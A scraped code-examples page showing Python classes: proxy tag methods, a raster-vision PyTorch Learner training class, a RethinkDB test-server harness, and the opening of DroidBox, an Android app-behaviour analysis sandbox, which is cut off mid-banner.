            retreq.response = retreq.response.unmangled

        return retreq

    # for these and submit, might need storage stored on the request itself
    def add_tag(self, reqid, tag, storage=None):
        self.msg_conn.add_tag(reqid, tag, storage=self._stg_or_def(storage))

    def remove_tag(self, reqid, tag, storage=None):
        self.msg_conn.remove_tag(reqid, tag, storage=self._stg_or_def(storage))

    def clear_tag(self, reqid, storage=None):
        self.msg_conn.clear_tag(reqid, storage=self._stg_or_def(storage))

    def all_saved_queries(self, storage=None):
        self.msg_conn.all_saved_queries(storage=None)

    def save_query(self, name, filt, storage=None):
        self.msg_conn.save_query(name, filt, storage=self._stg_or_def(storage))

    def load_query(self, name, storage=None):
        self.msg_conn.load_query(name, storage=self._stg_or_def(storage))

    def delete_query(self, name, storage=None):
        self.msg_conn.delete_query(name, storage=self._stg_or_def(storage))
示例#48
0
class Learner(ABC):
    """Abstract training and prediction routines for a model.

    This can be subclassed to handle different computer vision tasks. If a model_path
    is passed to the constructor, the Learner can only be used for prediction (ie. only
    predict and numpy_predict should be called). Otherwise, the Learner can be used for
    training using the main() method.

    Note that the validation set is used to validate at the end of each epoch, and the
    test set is only used at the end of training. It's possible to set these to the same
    dataset if desired.
    """
    def __init__(self,
                 cfg: LearnerConfig,
                 tmp_dir: str,
                 model_path: Optional[str] = None):
        """Constructor.

        Args:
            cfg: configuration
            tmp_dir: root of temp dirs
            model_path: a local path to model weights. If provided, the model is loaded
                and it is assumed that this Learner will be used for prediction only.
        """
        self.cfg = cfg
        self.tmp_dir = tmp_dir

        # TODO make cache dirs configurable
        torch_cache_dir = '/opt/data/torch-cache'
        os.environ['TORCH_HOME'] = torch_cache_dir
        self.device = 'cuda' if torch.cuda.is_available() else 'cpu'
        self.data_cache_dir = '/opt/data/data-cache'
        make_dir(self.data_cache_dir)

        self.model = self.build_model()
        self.model.to(self.device)

        if model_path is not None:
            if isfile(model_path):
                self.model.load_state_dict(
                    torch.load(model_path, map_location=self.device))
            else:
                raise Exception(
                    'Model could not be found at {}'.format(model_path))
            self.model.eval()
        else:
            log.info(self.cfg)

            # ds = dataset, dl = dataloader
            self.train_ds = None
            self.train_dl = None
            self.valid_ds = None
            self.valid_dl = None
            self.test_ds = None
            self.test_dl = None

            if FileSystem.get_file_system(cfg.output_uri) == LocalFileSystem:
                self.output_dir = cfg.output_uri
                make_dir(self.output_dir)
            else:
                self.output_dir = get_local_path(cfg.output_uri, tmp_dir)
                make_dir(self.output_dir, force_empty=True)
                if not cfg.overfit_mode:
                    self.sync_from_cloud()

            self.last_model_path = join(self.output_dir, 'last-model.pth')
            self.config_path = join(self.output_dir, 'learner-config.json')
            self.train_state_path = join(self.output_dir, 'train-state.json')
            self.log_path = join(self.output_dir, 'log.csv')
            model_bundle_fn = basename(cfg.get_model_bundle_uri())
            self.model_bundle_path = join(self.output_dir, model_bundle_fn)
            self.metric_names = self.build_metric_names()

            str_to_file(self.cfg.json(), self.config_path)
            self.load_init_weights()
            self.load_checkpoint()
            self.opt = self.build_optimizer()
            self.setup_data()
            self.start_epoch = self.get_start_epoch()
            self.steps_per_epoch = len(
                self.train_ds) // self.cfg.solver.batch_sz
            self.step_scheduler = self.build_step_scheduler()
            self.epoch_scheduler = self.build_epoch_scheduler()
            self.setup_tensorboard()

    def main(self):
        """Main training sequence.

        This plots the dataset, runs a training and validation loop (which will resume if
        interrupted), logs stats, plots predictions, and syncs results to the cloud.
        """
        self.run_tensorboard()
        cfg = self.cfg
        self.log_data_stats()
        if not cfg.predict_mode:
            self.plot_dataloaders()
            if cfg.overfit_mode:
                self.overfit()
            else:
                self.train()
                if cfg.save_model_bundle:
                    self.save_model_bundle()

        self.load_checkpoint()
        if cfg.eval_train:
            self.eval_model('train')
        self.eval_model('test')
        self.sync_to_cloud()
        self.stop_tensorboard()

    def sync_to_cloud(self):
        """Sync any output to the cloud at output_uri."""
        sync_to_dir(self.output_dir, self.cfg.output_uri)

    def sync_from_cloud(self):
        """Sync any previous output in the cloud to output_dir."""
        sync_from_dir(self.cfg.output_uri, self.output_dir)

    def setup_tensorboard(self):
        """Setup for logging stats to TB."""
        self.tb_writer = None
        if self.cfg.log_tensorboard:
            self.tb_log_dir = join(self.output_dir, 'tb-logs')
            make_dir(self.tb_log_dir)
            self.tb_writer = SummaryWriter(log_dir=self.tb_log_dir)

    def run_tensorboard(self):
        """Run TB server serving logged stats."""
        if self.cfg.run_tensorboard:
            log.info('Starting tensorboard process')
            self.tb_process = Popen(
                ['tensorboard', '--logdir={}'.format(self.tb_log_dir)])
            terminate_at_exit(self.tb_process)

    def stop_tensorboard(self):
        """Stop TB logging and server if it's running."""
        if self.cfg.log_tensorboard:
            self.tb_writer.close()
            if self.cfg.run_tensorboard:
                self.tb_process.terminate()

    @abstractmethod
    def build_model(self) -> nn.Module:
        """Build a PyTorch model."""
        pass

    def unzip_data(self, uri: Union[str, List[str]]) -> List[str]:
        """Unzip dataset zip files.

        Args:
            uri: a list of URIs of zip files or the URI of a directory containing
                zip files

        Returns:
            paths to directories that each contain contents of one zip file
        """
        data_dirs = []

        if isinstance(uri, list):
            zip_uris = uri
        else:
            zip_uris = ([uri] if uri.endswith('.zip') else list_paths(
                uri, 'zip'))

        for zip_ind, zip_uri in enumerate(zip_uris):
            zip_path = get_local_path(zip_uri, self.data_cache_dir)
            if not isfile(zip_path):
                zip_path = download_if_needed(zip_uri, self.data_cache_dir)
            with zipfile.ZipFile(zip_path, 'r') as zipf:
                data_dir = join(self.tmp_dir, 'data', str(uuid.uuid4()),
                                str(zip_ind))
                data_dirs.append(data_dir)
                zipf.extractall(data_dir)

        return data_dirs

    def get_bbox_params(self) -> Optional[BboxParams]:
        """Returns BboxParams used by albumentations for data augmentation."""
        return None

    def get_data_transforms(self) -> Tuple[BasicTransform, BasicTransform]:
        """Get albumentations transform objects for data augmentation.

        Returns:
           1st tuple arg: a transform that doesn't do any data augmentation
           2nd tuple arg: a transform with data augmentation
        """
        cfg = self.cfg
        bbox_params = self.get_bbox_params()
        transform = Compose([Resize(cfg.data.img_sz, cfg.data.img_sz)],
                            bbox_params=bbox_params)

        augmentors_dict = {
            'Blur': Blur(),
            'RandomRotate90': RandomRotate90(),
            'HorizontalFlip': HorizontalFlip(),
            'VerticalFlip': VerticalFlip(),
            'GaussianBlur': GaussianBlur(),
            'GaussNoise': GaussNoise(),
            'RGBShift': RGBShift(),
            'ToGray': ToGray()
        }
        aug_transforms = []
        for augmentor in cfg.data.augmentors:
            try:
                aug_transforms.append(augmentors_dict[augmentor])
            except KeyError as e:
                log.warning(
                    '{0} is an unknown augmentor. Continuing without {0}. \
                    Known augmentors are: {1}'.format(
                        e, list(augmentors_dict.keys())))
        aug_transforms.append(Resize(cfg.data.img_sz, cfg.data.img_sz))
        aug_transform = Compose(aug_transforms, bbox_params=bbox_params)

        return transform, aug_transform

    def get_collate_fn(self) -> Optional[callable]:
        """Returns a custom collate_fn to use in DataLoader.

        None is returned if default collate_fn should be used.

        See https://pytorch.org/docs/stable/data.html#working-with-collate-fn
        """
        return None

    def _get_datasets(
        self,
        uri: Union[str,
                   List[str]]) -> Tuple[Dataset, Dataset, Dataset]:  # noqa
        """Gets Datasets for a single group of chips.

        This should be overridden for each Learner subclass.

        Args:
            uri: a list of URIs of zip files or the URI of a directory containing
                zip files

        Returns:
            train, validation, and test DataSets."""
        raise NotImplementedError()

    def get_datasets(self) -> Tuple[Dataset, Dataset, Dataset]:
        """Returns train, validation, and test DataSets."""
        if self.cfg.data.group_uris:
            train_ds_lst, valid_ds_lst, test_ds_lst = [], [], []
            for group_uri in self.cfg.data.group_uris:
                train_ds, valid_ds, test_ds = self._get_datasets(group_uri)
                group_train_sz = self.cfg.data.group_train_sz
                if group_train_sz is not None:
                    train_inds = list(range(len(train_ds)))
                    random.seed(1234)
                    random.shuffle(train_inds)
                    train_inds = train_inds[0:group_train_sz]
                    train_ds = Subset(train_ds, train_inds)
                train_ds_lst.append(train_ds)
                valid_ds_lst.append(valid_ds)
                test_ds_lst.append(test_ds)

            train_ds, valid_ds, test_ds = (ConcatDataset(train_ds_lst),
                                           ConcatDataset(valid_ds_lst),
                                           ConcatDataset(test_ds_lst))
            return train_ds, valid_ds, test_ds
        else:
            return self._get_datasets(self.cfg.data.uri)

    def setup_data(self):
        """Set the the DataSet and DataLoaders for train, validation, and test sets."""
        cfg = self.cfg
        batch_sz = self.cfg.solver.batch_sz
        num_workers = self.cfg.data.num_workers

        train_ds, valid_ds, test_ds = self.get_datasets()
        if len(train_ds) < batch_sz:
            raise ConfigError(
                'Training dataset has fewer elements than batch size.')
        if len(valid_ds) < batch_sz:
            raise ConfigError(
                'Validation dataset has fewer elements than batch size.')
        if len(test_ds) < batch_sz:
            raise ConfigError(
                'Test dataset has fewer elements than batch size.')

        if cfg.overfit_mode:
            train_ds = Subset(train_ds, range(batch_sz))
            valid_ds = train_ds
            test_ds = train_ds
        elif cfg.test_mode:
            train_ds = Subset(train_ds, range(batch_sz))
            valid_ds = Subset(valid_ds, range(batch_sz))
            test_ds = Subset(test_ds, range(batch_sz))

        if cfg.data.train_sz is not None:
            train_inds = list(range(len(train_ds)))
            random.seed(1234)
            random.shuffle(train_inds)
            train_inds = train_inds[0:cfg.data.train_sz]
            train_ds = Subset(train_ds, train_inds)

        collate_fn = self.get_collate_fn()
        train_dl = DataLoader(train_ds,
                              shuffle=True,
                              batch_size=batch_sz,
                              num_workers=num_workers,
                              pin_memory=True,
                              collate_fn=collate_fn)
        valid_dl = DataLoader(valid_ds,
                              shuffle=True,
                              batch_size=batch_sz,
                              num_workers=num_workers,
                              pin_memory=True,
                              collate_fn=collate_fn)
        test_dl = DataLoader(test_ds,
                             shuffle=True,
                             batch_size=batch_sz,
                             num_workers=num_workers,
                             pin_memory=True,
                             collate_fn=collate_fn)

        self.train_ds, self.valid_ds, self.test_ds = (train_ds, valid_ds,
                                                      test_ds)
        self.train_dl, self.valid_dl, self.test_dl = (train_dl, valid_dl,
                                                      test_dl)

    def log_data_stats(self):
        """Log stats about each DataSet."""
        if self.train_ds:
            log.info('train_ds: {} items'.format(len(self.train_ds)))
        if self.valid_ds:
            log.info('valid_ds: {} items'.format(len(self.valid_ds)))
        if self.test_ds:
            log.info('test_ds: {} items'.format(len(self.test_ds)))

    def build_optimizer(self) -> optim.Optimizer:
        """Returns optimizer."""
        return optim.Adam(self.model.parameters(), lr=self.cfg.solver.lr)

    def build_step_scheduler(self) -> _LRScheduler:
        """Returns an LR scheduler that changes the LR each step.

        This is used to implement the "one cycle" schedule popularized by
        fastai.
        """
        scheduler = None
        cfg = self.cfg
        if cfg.solver.one_cycle and cfg.solver.num_epochs > 1:
            total_steps = cfg.solver.num_epochs * self.steps_per_epoch
            step_size_up = (cfg.solver.num_epochs // 2) * self.steps_per_epoch
            step_size_down = total_steps - step_size_up
            scheduler = CyclicLR(self.opt,
                                 base_lr=cfg.solver.lr / 10,
                                 max_lr=cfg.solver.lr,
                                 step_size_up=step_size_up,
                                 step_size_down=step_size_down,
                                 cycle_momentum=False)
            for _ in range(self.start_epoch * self.steps_per_epoch):
                scheduler.step()
        return scheduler

    def build_epoch_scheduler(self) -> _LRScheduler:
        """Returns an LR scheduler tha changes the LR each epoch.

        This is used to divide the LR by 10 at certain epochs.
        """
        scheduler = None
        if self.cfg.solver.multi_stage:
            scheduler = MultiStepLR(self.opt,
                                    milestones=self.cfg.solver.multi_stage,
                                    gamma=0.1)
            for _ in range(self.start_epoch):
                scheduler.step()
        return scheduler

    def build_metric_names(self) -> List[str]:
        """Returns names of metrics used to validate model at each epoch."""
        metric_names = [
            'epoch', 'train_time', 'valid_time', 'train_loss', 'val_loss',
            'avg_f1', 'avg_precision', 'avg_recall'
        ]

        for label in self.cfg.data.class_names:
            metric_names.extend([
                '{}_f1'.format(label), '{}_precision'.format(label),
                '{}_recall'.format(label)
            ])
        return metric_names

    @abstractmethod
    def train_step(self, batch: any, batch_ind: int) -> MetricDict:
        """Compute loss for a single training batch.

        Args:
            batch: batch data needed to compute loss
            batch_ind: index of batch within epoch

        Returns:
            dict with 'train_loss' as key and possibly other losses
        """
        pass

    @abstractmethod
    def validate_step(self, batch: any, batch_ind: int) -> MetricDict:
        """Compute metrics on validation batch.

        Args:
            batch: batch data needed to compute validation metrics
            batch_ind: index of batch within epoch

        Returns:
            dict with metric names mapped to metric values
        """
        pass

    def train_end(self, outputs: List[MetricDict],
                  num_samples: int) -> MetricDict:
        """Aggregate the ouput of train_step at the end of the epoch.

        Args:
            outputs: a list of outputs of train_step
            num_samples: total number of training samples processed in epoch
        """
        metrics = {}
        for k in outputs[0].keys():
            metrics[k] = torch.stack([o[k] for o in outputs
                                      ]).sum().item() / num_samples
        return metrics

    def validate_end(self, outputs: List[MetricDict],
                     num_samples: int) -> MetricDict:
        """Aggregate the ouput of validate_step at the end of the epoch.

        Args:
            outputs: a list of outputs of validate_step
            num_samples: total number of validation samples processed in epoch
        """
        metrics = {}
        for k in outputs[0].keys():
            metrics[k] = torch.stack([o[k] for o in outputs
                                      ]).sum().item() / num_samples
        return metrics

    def post_forward(self, x: any) -> any:
        """Post process output of call to model().

        Useful for when predictions are inside a structure returned by model().
        """
        return x

    def prob_to_pred(self, x: Tensor) -> Tensor:
        """Convert a Tensor with prediction probabilities to class ids.

        The class ids should be the classes with the maximum probability.
        """
        raise NotImplementedError()

    def to_batch(self, x: Tensor) -> Tensor:
        """Ensure that image array has batch dimension.

        Args:
            x: assumed to be either image or batch of images

        Returns:
            x with extra batch dimension of length 1 if needed
        """
        if x.ndim == 3:
            x = x.unsqueeze(0)
        return x

    def normalize_input(self, x: Tensor) -> Tensor:
        """Normalize an input image to have values between 0 and 1.

        Args:
            x: an image or batch of images assumed to be in uint8 format

        Returns:
            the same tensor that has been scaled to [0-1].

        """
        return x.float() / 255.0

    def predict(self,
                x: Tensor,
                normalize: bool = False,
                raw_out: bool = False) -> any:
        """Make prediction for an image or batch of images.

        Args:
            x: image or batch of images
            normalize: if True, call normalize_input() on x before passing into model
            raw_out: if True, return prediction probabilities

        Returns:
            the predictions, in probability form if raw_out is True, in class_id form
                otherwise
        """
        x = self.to_batch(x)
        if normalize:
            x = self.normalize_input(x)
        x = self.to_device(x, self.device)
        with torch.no_grad():
            out = self.model(x)
            if not raw_out:
                out = self.prob_to_pred(self.post_forward(out))
        out = self.to_device(out, 'cpu')
        return out

    def output_to_numpy(self, out: any) -> any:
        """Convert output of model to numpy format.

        Args:
            out: the output of the model in PyTorch format

        Returns: the output of the model in numpy format
        """
        return out.numpy()

    def numpy_predict(self, x: np.ndarray, raw_out: bool = False) -> any:
        """Make a prediction using an image or batch of images in numpy format.

        Args:
            x: (ndarray) of shape [height, width, channels] or
                [batch_sz, height, width, channels] in uint8 format
            raw_out: if True, return prediction probabilities

        Returns:
            predictions using numpy arrays
        """
        x = torch.tensor(x)
        x = self.to_batch(x)
        x = x.permute((0, 3, 1, 2))
        out = self.predict(x, normalize=True, raw_out=raw_out)
        return self.output_to_numpy(out)

    def predict_dataloader(self,
                           dl: DataLoader,
                           one_batch: bool = False,
                           return_x: bool = True):
        """Make predictions over all batches in a DataLoader.

        Args:
            dl: the DataLoader
            one_batch: if True, just makes predictions over the first batch
            return_x: if True, returns all the inputs in addition to the predictions and
                targets

        Returns:
            if return_x: (x, y, z) ie. all images, labels, predictions for dl
            else: (y, z) ie. all labels, predictions for dl
        """
        self.model.eval()

        xs, ys, zs = [], [], []
        with torch.no_grad():
            for x, y in dl:
                x = self.to_device(x, self.device)
                z = self.prob_to_pred(self.post_forward(self.model(x)))
                x = self.to_device(x, 'cpu')
                z = self.to_device(z, 'cpu')
                if one_batch:
                    return x, y, z
                if return_x:
                    xs.append(x)
                ys.append(y)
                zs.append(z)

        if return_x:
            return torch.cat(xs), torch.cat(ys), torch.cat(zs)
        return torch.cat(ys), torch.cat(zs)

    def get_dataloader(self, split: str) -> DataLoader:
        """Get the DataLoader for a split.

        Args:
            split: a split name which can be train, valid, or test
        """
        if split == 'train':
            return self.train_dl
        elif split == 'valid':
            return self.valid_dl
        elif split == 'test':
            return self.test_dl
        else:
            raise ValueError('{} is not a valid split'.format(split))

    @abstractmethod
    def plot_xyz(self, ax, x: Tensor, y, z=None):
        """Plot image, ground truth labels, and predicted labels.

        Args:
            ax: matplotlib axis on which to plot
            x: image
            y: ground truth labels
            z: optional predicted labels
        """
        pass

    def plot_batch(self, x: Tensor, y, output_path: str, z=None):
        """Plot a whole batch in a grid using plot_xyz.

        Args:
            x: batch of images
            y: ground truth labels
            output_path: local path where to save plot image
            z: optional predicted labels
        """
        batch_sz = x.shape[0]
        ncols = nrows = math.ceil(math.sqrt(batch_sz))
        fig = plt.figure(constrained_layout=True,
                         figsize=(3 * ncols, 3 * nrows))
        grid = gridspec.GridSpec(ncols=ncols, nrows=nrows, figure=fig)

        for i in range(batch_sz):
            ax = fig.add_subplot(grid[i])
            if z is None:
                self.plot_xyz(ax, x[i], y[i])
            else:
                self.plot_xyz(ax, x[i], y[i], z=z[i])

        make_dir(output_path, use_dirname=True)
        plt.savefig(output_path)
        plt.close()

    def plot_predictions(self, split: str):
        """Plot predictions for a split.

        Uses the first batch for the corresponding DataLoader.

        Args:
            split: dataset split. Can be train, valid, or test.
        """
        log.info('Plotting predictions...')
        dl = self.get_dataloader(split)
        output_path = join(self.output_dir, '{}_preds.png'.format(split))
        x, y, z = self.predict_dataloader(dl, one_batch=True)
        self.plot_batch(x, y, output_path, z=z)

    def plot_dataloader(self, dl: DataLoader, output_path: str):
        """Plot images and ground truth labels for a DataLoader."""
        x, y = next(iter(dl))
        self.plot_batch(x, y, output_path)

    def plot_dataloaders(self):
        """Plot images and ground truth labels for all DataLoaders."""
        if self.train_dl:
            self.plot_dataloader(
                self.train_dl, join(self.output_dir, 'dataloaders/train.png'))
        if self.valid_dl:
            self.plot_dataloader(
                self.valid_dl, join(self.output_dir, 'dataloaders/valid.png'))
        if self.test_dl:
            self.plot_dataloader(self.test_dl,
                                 join(self.output_dir, 'dataloaders/test.png'))

    @staticmethod
    def from_model_bundle(model_bundle_uri: str, tmp_dir: str):
        """Create a Learner from a model bundle."""
        model_bundle_path = download_if_needed(model_bundle_uri, tmp_dir)
        model_bundle_dir = join(tmp_dir, 'model-bundle')
        unzip(model_bundle_path, model_bundle_dir)

        config_path = join(model_bundle_dir, 'pipeline-config.json')
        model_path = join(model_bundle_dir, 'model.pth')

        config_dict = file_to_json(config_path)
        config_dict = upgrade_config(config_dict)

        cfg = build_config(config_dict)
        return cfg.learner.build(tmp_dir, model_path=model_path)

    def save_model_bundle(self):
        """Save a model bundle.

        This is a zip file with the model weights in .pth format and a serialized
        copy of the LearningConfig, which allows for making predictions in the future.
        """
        from rastervision.pytorch_learner.learner_pipeline_config import (
            LearnerPipelineConfig)
        model_bundle_dir = join(self.tmp_dir, 'model-bundle')
        make_dir(model_bundle_dir)
        shutil.copyfile(self.last_model_path,
                        join(model_bundle_dir, 'model.pth'))
        pipeline_cfg = LearnerPipelineConfig(learner=self.cfg)
        save_pipeline_config(pipeline_cfg,
                             join(model_bundle_dir, 'pipeline-config.json'))
        zipdir(model_bundle_dir, self.model_bundle_path)

    def get_start_epoch(self) -> int:
        """Get start epoch.

        If training was interrupted, this returns the last complete epoch + 1.
        """
        start_epoch = 0
        if isfile(self.log_path):
            with open(self.log_path) as log_file:
                last_line = log_file.readlines()[-1]
            last_epoch = int(last_line.split(',')[0].strip())
            start_epoch = last_epoch + 1
        return start_epoch

    def load_init_weights(self):
        """Load the weights to initialize model."""
        if self.cfg.model.init_weights:
            weights_path = download_if_needed(self.cfg.model.init_weights,
                                              self.tmp_dir)
            self.model.load_state_dict(
                torch.load(weights_path, map_location=self.device))

    def load_checkpoint(self):
        """Load last weights from previous run if available."""
        if isfile(self.last_model_path):
            log.info('Loading checkpoint from {}'.format(self.last_model_path))
            self.model.load_state_dict(
                torch.load(self.last_model_path, map_location=self.device))

    def to_device(self, x: any, device: str) -> any:
        """Load Tensors onto a device.

        Args:
            x: some object with Tensors in it
            device: 'cpu' or 'cuda'

        Returns:
            x but with any Tensors in it on the device
        """
        if isinstance(x, list):
            return [_x.to(device) for _x in x]
        else:
            return x.to(device)

    def train_epoch(self) -> MetricDict:
        """Train for a single epoch."""
        start = time.time()
        self.model.train()
        num_samples = 0
        outputs = []
        with click.progressbar(self.train_dl, label='Training') as bar:
            for batch_ind, (x, y) in enumerate(bar):
                x = self.to_device(x, self.device)
                y = self.to_device(y, self.device)
                batch = (x, y)
                self.opt.zero_grad()
                output = self.train_step(batch, batch_ind)
                outputs.append(output)
                loss = output['train_loss']
                loss.backward()
                self.opt.step()
                if self.step_scheduler:
                    self.step_scheduler.step()
                num_samples += x.shape[0]
        metrics = self.train_end(outputs, num_samples)
        end = time.time()
        train_time = datetime.timedelta(seconds=end - start)
        metrics['train_time'] = str(train_time)
        return metrics

    def validate_epoch(self, dl: DataLoader) -> MetricDict:
        """Validate for a single epoch."""
        start = time.time()
        self.model.eval()
        num_samples = 0
        outputs = []
        with torch.no_grad():
            with click.progressbar(dl, label='Validating') as bar:
                for batch_ind, (x, y) in enumerate(bar):
                    x = self.to_device(x, self.device)
                    y = self.to_device(y, self.device)
                    batch = (x, y)
                    output = self.validate_step(batch, batch_ind)
                    outputs.append(output)
                    num_samples += x.shape[0]
        end = time.time()
        validate_time = datetime.timedelta(seconds=end - start)

        metrics = self.validate_end(outputs, num_samples)
        metrics['valid_time'] = str(validate_time)
        return metrics

    def overfit(self):
        """Optimize model using the same batch repeatedly."""
        self.on_overfit_start()

        x, y = next(iter(self.train_dl))
        x = self.to_device(x, self.device)
        y = self.to_device(y, self.device)
        batch = (x, y)

        with click.progressbar(range(self.cfg.solver.overfit_num_steps),
                               label='Overfitting') as bar:
            for step in bar:
                loss = self.train_step(batch, step)['train_loss']
                loss.backward()
                self.opt.step()

                if (step + 1) % 25 == 0:
                    log.info('\nstep: {}'.format(step))
                    log.info('train_loss: {}'.format(loss))

        torch.save(self.model.state_dict(), self.last_model_path)

    def train(self):
        """Training loop that will attempt to resume training if appropriate."""
        self.on_train_start()

        if self.start_epoch > 0 and self.start_epoch <= self.cfg.solver.num_epochs:
            log.info('Resuming training from epoch {}'.format(
                self.start_epoch))

        for epoch in range(self.start_epoch, self.cfg.solver.num_epochs):
            log.info('epoch: {}'.format(epoch))
            train_metrics = self.train_epoch()
            if self.epoch_scheduler:
                self.epoch_scheduler.step()
            valid_metrics = self.validate_epoch(self.valid_dl)
            metrics = dict(epoch=epoch, **train_metrics, **valid_metrics)
            log.info('metrics: {}'.format(metrics))

            self.on_epoch_end(epoch, metrics)

    def on_overfit_start(self):
        """Hook that is called at start of overfit routine."""
        pass

    def on_train_start(self):
        """Hook that is called at start of train routine."""
        pass

    def on_epoch_end(self, curr_epoch, metrics):
        """Hook that is called at end of epoch.

        Writes metrics to CSV and TB, and saves model.
        """
        if not isfile(self.log_path):
            with open(self.log_path, 'w') as log_file:
                log_writer = csv.writer(log_file)
                row = self.metric_names
                log_writer.writerow(row)

        with open(self.log_path, 'a') as log_file:
            log_writer = csv.writer(log_file)
            row = [metrics[k] for k in self.metric_names]
            log_writer.writerow(row)

        if self.cfg.log_tensorboard:
            for key, val in metrics.items():
                if isinstance(val, numbers.Number):
                    self.tb_writer.add_scalar(key, val, curr_epoch)
            for name, param in self.model.named_parameters():
                self.tb_writer.add_histogram(name, param, curr_epoch)
            self.tb_writer.flush()

        torch.save(self.model.state_dict(), self.last_model_path)

        if (curr_epoch + 1) % self.cfg.solver.sync_interval == 0:
            self.sync_to_cloud()

    def eval_model(self, split: str):
        """Evaluate model using a particular dataset split.

        Gets validation metrics and saves them along with prediction plots.

        Args:
            split: the dataset split to use: train, valid, or test.
        """
        log.info('Evaluating on {} set...'.format(split))
        dl = self.get_dataloader(split)
        metrics = self.validate_epoch(dl)
        log.info('metrics: {}'.format(metrics))
        json_to_file(metrics,
                     join(self.output_dir, '{}_metrics.json'.format(split)))
        self.plot_predictions(split)
示例#49
0
class RethinkDBTestServer(object):
    def __init__(self,
                 server_build_dir=None,
                 use_default_port=False,
                 cache_size=1024,
                 data_dir='./'):
        self.server_build_dir = server_build_dir
        self.use_default_port = use_default_port
        self.cache_size = cache_size
        self.data_dir = data_dir

    # Implement `with` methods to ensure proper lifetime management
    def __enter__(self):
        self.start()
        return self

    def __exit__(self, *args):
        self.stop()

    # Find a free port to bind to
    def find_available_port(self):
        max_loop = 10
        for i in xrange(max_loop):
            port = random.randint(1025, 65535)
            if self.port_available(port):
                return port
        raise Exception("""Wow, you must have won the lottery or something.
                           Ten random ports and they're all occupied""")

    # Test if a given port is free
    def port_available(self, port):
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.bind(("127.0.0.1", port))
            s.close()
        except socket.error:
            return False
        return True

    def start(self):
        if self.use_default_port:
            self.cpp_port = 28015
        else:
            self.cpp_port = self.find_available_port()
        self.cluster_port = self.find_available_port()
        directory, log_out = self.create(self.data_dir)

        self.cpp_server = Popen([
            self.executable, 'serve', '--driver-port',
            str(self.cpp_port), '--directory', directory, '--http-port', '0',
            '--cache-size',
            str(self.cache_size), '--cluster-port',
            str(self.cluster_port)
        ],
                                stdout=log_out,
                                stderr=log_out)
        sleep(2)

        return self.cluster_port

    # Join a cluster headed by a server previously invoked with start
    def join(self, cluster_port):
        self.cpp_port = self.find_available_port()
        self.cluster_port = self.find_available_port()
        directory, log_out = self.create(self.data_dir)
        self.cpp_server = Popen([
            self.executable, 'serve', '--driver-port',
            str(self.cpp_port), '--cluster-port',
            str(self.cluster_port), '--directory', directory, '--http-port',
            '0', '--join',
            'localhost:%d' % cluster_port
        ],
                                stdout=log_out,
                                stderr=log_out)
        sleep(2)

    def create(self, data_dir):
        directory = data_dir + 'run/server_%s/' % self.cpp_port
        rdbfile = directory + 'rdb'
        call(['mkdir', '-p', directory])
        self.log_file = directory + 'server-log.txt'
        log_out = open(self.log_file, 'a')
        self.executable = os.path.join(
            self.server_build_dir or os.getenv('RETHINKDB_BUILD_DIR')
            or '../../build/debug', 'rethinkdb')
        call([self.executable, 'create', '--directory', rdbfile],
             stdout=log_out,
             stderr=log_out)
        return rdbfile, log_out

    def stop(self):
        code = self.cpp_server.poll()
        if code == None:
            self.cpp_server.terminate()
            code = self.cpp_server.wait()
        if code != 0:
            raise Exception(
                "Error: rethinkdb process %d failed with error code %d\n%s" %
                (self.cpp_server.pid, code, open(self.log_file).read()))
        sleep(0.1)

    def resstart(self):
        self.stop()
        self.start()

    def alive(self):
        return self.cpp_server.poll() == None
示例#50
0
class DroidBox(object):
    def __init__(self, output_dir=None):
        self.sendsms = {}
        self.phonecalls = {}
        self.cryptousage = {}
        self.dexclass = {}
        self.dataleaks = {}
        self.opennet = {}
        self.sendnet = {}
        self.recvnet = {}
        self.closenet = {}
        self.fdaccess = {}
        self.servicestart = {}
        self.accessedfiles = {}
        self.enabled = True

        self.adb = None

        self.application = None
        self.apk_name = None
        self.apk_hashes = None
        self.applicationStarted = 0

        self.is_counting_logs = False
        self.timer = None

        if output_dir:
            self.output_dir = output_dir
            if not os.path.exists(self.output_dir):
                os.mkdir(self.output_dir)
        else:
            #Posibility that no output-files is generated
            self.output_dir = None

    def set_apk(self, apk_name):
        if not self.enabled:
            return
        if apk_name is None:
            return
        # APK existing?
        if not os.path.isfile(apk_name):
            print("File %s not found" % apk_name)
            sys.exit(1)

        self.apk_name = os.path.abspath(apk_name)

        self.application = Application(apk_name)
        ret = self.application.processAPK()

        # Error during the APK processing?
        if ret == 0:
            print("Failed to analyze the APK. Terminate the analysis.")
            sys.exit(1)

        main_activity = self.application.getMainActivity()
        package_name = self.application.getPackage()
        self.apk_hashes = self.application.getHashes()

        # No Main acitvity found? Return an error
        if main_activity == None:
            print("No activity to start. Terminate the analysis.")
            sys.exit(1)

        # No packages identified? Return an error
        if package_name == None:
            print("No package found. Terminate the analysis.")
            sys.exit(1)

        # Execute the application
        call(["adb", "logcat", "-c"])
        ret = call([
            'monkeyrunner', 'monkeyrunner.py', apk_name, package_name,
            main_activity
        ],
                   stderr=PIPE,
                   cwd=os.path.dirname(os.path.realpath(__file__)))

        if (ret == 1):
            print("Failed to execute the application.")
            sys.exit(1)

        print("Starting the activity %s..." % main_activity)

        # By default the application has not started
        self.applicationStarted = 0
        stringApplicationStarted = "Start proc %s" % package_name

        # Open the adb logcat
        if self.adb is None:
            self.adb = Popen([
                "adb", "logcat", "DroidBox:W", "dalvikvm:W",
                "ActivityManager:I"
            ],
                             stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE)

        # Wait for the application to start
        while 1:
            try:
                logcatInput = self.adb.stdout.readline()
                if not logcatInput:
                    raise Exception("We have lost the connection with ADB.")

                # Application started?
                if (stringApplicationStarted in logcatInput):
                    self.applicationStarted = 1
                    break
            except:
                break

        if (self.applicationStarted == 0):
            print("Analysis has not been done.")
            # Kill ADB, otherwise it will never terminate
            os.kill(self.adb.pid, signal.SIGTERM)
            sys.exit(1)

        print("Application started")

    def start_unblocked(self, duration=0):
        droidbox_thread = threading.Thread(target=self.start_blocked,
                                           args=(duration, ))
        droidbox_thread.start()

    def stop(self):
        self.enabled = False
        if self.timer and self.timer.isAlive():
            self.timer.cancel()
        if self.adb is not None:
            self.adb.terminate()
            self.adb = None

    def start_blocked(self, duration=0):
        if not self.enabled:
            return
        # curses.setupterm()
        # sys.stdout.write(curses.tigetstr("clear"))
        sys.stdout.flush()
        call(["adb", "wait-for-device"])
        call(['adb', 'logcat', '-c'])

        print " ____                        __  ____"
        print "/\  _`\               __    /\ \/\  _`\\"
        print "\ \ \/\ \  _ __  ___ /\_\   \_\ \ \ \L\ \   ___   __  _"
